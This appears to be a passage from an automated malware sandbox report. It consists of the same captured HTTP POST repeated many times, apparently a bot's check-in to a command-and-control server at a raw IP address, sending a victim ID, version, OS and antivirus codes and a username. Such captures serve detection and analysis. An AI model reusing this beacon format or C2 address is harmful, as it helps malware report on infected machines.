                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
